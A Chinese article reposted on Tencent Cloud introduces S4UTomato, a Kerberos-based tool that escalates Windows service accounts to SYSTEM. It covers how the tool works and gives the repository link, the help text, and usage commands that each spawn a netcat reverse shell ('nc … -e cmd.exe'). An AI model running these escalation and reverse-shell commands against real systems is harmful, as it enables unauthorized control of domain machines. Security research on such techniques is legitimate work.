前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >如何使用S4UTomato通过Kerberos将服务账号提权为LocalSystem

如何使用S4UTomato通过Kerberos将服务账号提权为LocalSystem

作者头像
FB客服
发布2023-12-13 16:56:50
2260
发布2023-12-13 16:56:50
举报
文章被收录于专栏:FreeBufFreeBuf

关于S4UTomato

S4UTomato是一款功能强大的权限提升工具,该工具专为蓝队研究人员设计,可以通过Kerberos将服务账号(Service Account)权限提升为LocalSystem。

工具运行机制

熟悉“Potato”系列权限提升工具的研究人员肯定知道,这类工具可以将服务账号提升为本地系统权限,“Potato”所使用的技术和S4UTomato类似,即利用COM接口的特定功能,欺骗NT AUTHORITY\SYSTEM账号跟攻击者控制的RPC服务器进行连接,并完成身份认证。接下来,通过一系列API调用,并在身份认证过程中执行中间人攻击(NTLM中继),以生成针对目标本地系统中NT AUTHORITY\SYSTEM账号的访问令牌。最后,攻击者将能够获取到这个令牌,然后使用CreateProcessWithToken()或CreateProcessAsUser()函数传递令牌,并创建一个新的进程来获取SYSTEM权限。

Kerbero的角色

在Windows域环境中,SYSTEM、NT AUTHORITY\NETWORK SERVICE和Microsoft虚拟帐户可以用于对加入域的系统计算机帐户进行身份验证,而在现代版本的Windows中,大多数Windows服务默认使用Microsoft虚拟帐户运行。值得注意的是,IIS和MSSQL也在使用这些虚拟帐户。因此,我们可以使用S4UTomato来获取本地机器上域管理员帐户“administrator”的服务凭证,然后在SCMUACBypass工具的帮助下,利用该凭证创建系统服务并获得SYSTEM权限。

在计算机加入域的任意情况下,只要我们能够在Windows服务帐户或Microsoft虚拟帐户的上下文下运行代码,就可以利用上述技术进行本地权限提升。

在执行操作之前,我们需要为本地设备账户获取TGT,但由于服务账户权限的限制,导致我们无法获取到长期密钥,因此无法构造KRB_AS_REQ请求。为了实现上述目标,S4UTomato利用了三种技术:基于资源的约束委派、影子凭据和Tgtdeleg。

工具下载

由于该工具基于C#开发,因此我们首先需要在本地设备上安装并配置好最新版本的Visual Studio。

接下来,广大研究人员可以直接使用下列命令将该项目源码克隆至本地:

代码语言:javascript
复制
git clone https://github.com/wh0amitz/S4UTomato.git

然后在Visual Studio中导入项目,并完成代码构建和编译即可。

工具使用帮助

代码语言:javascript
复制
C:\Users\whoami\Desktop>S4UTomato.exe --help



S4UTomato 1.0.0-beta

Copyright (c) 2023



  -d, --Domain              需要认证的目标域名(FQDN)

  -s, --Server               域控制器或LDAP服务器的主机名称

  -m, --ComputerName        需要创建的新计算机账号

  -p, --ComputerPassword    新创建计算机账号的密码

  -f, --Force               强制更新计算机对象的'msDS-KeyCredentialLink'属性

  -c, --Command             需要运行的程序

  -v, --Verbose              输出Verbose调试信息

  --help                    显示工具帮助信息

  --version                 显示工具版本信息

(向右滑动,查看更多)

工具使用演示

通过基于资源的约束委派实现本地特权提升

代码语言:javascript
复制
S4UTomato.exe rbcd -m NEWCOMPUTER -p pAssw0rd -c "nc.exe 127.0.0.1 4444 -e cmd.exe"

(向右滑动,查看更多)

通过影子凭证实现本地特权提升

代码语言:javascript
复制
S4UTomato.exe shadowcred -c "nc 127.0.0.1 4444 -e cmd.exe" -f

(向右滑动,查看更多)

通过Tgtdeleg实现本地特权提升

代码语言:javascript
复制
# 首先通过Tgtdeleg获取TGT

S4UTomato.exe tgtdeleg

# 然后运行SCMUACBypass 获取SYSTEM权限

S4UTomato.exe krbscm -c "nc 127.0.0.1 4444 -e cmd.exe"

项目地址

S4UTomato

https://github.com/wh0amitz/S4UTomato

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2023-12-12,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 FreeBuf 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 关于S4UTomato
  • 工具运行机制
  • Kerbero的角色
  • 工具下载
  • 工具使用帮助
  • (向右滑动,查看更多)
  • 工具使用演示
    • 通过基于资源的约束委派实现本地特权提升
    • (向右滑动,查看更多)
      • 通过影子凭证实现本地特权提升
      • (向右滑动,查看更多)
        • 通过Tgtdeleg实现本地特权提升
        • 项目地址
        相关产品与服务
        多因子身份认证
        多因子身份认证(Multi-factor Authentication Service,MFAS)的目的是建立一个多层次的防御体系,通过结合两种或三种认证因子(基于记忆的/基于持有物的/基于生物特征的认证因子)验证访问者的身份,使系统或资源更加安全。攻击者即使破解单一因子(如口令、人脸),应用的安全依然可以得到保障。
        领券
        问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档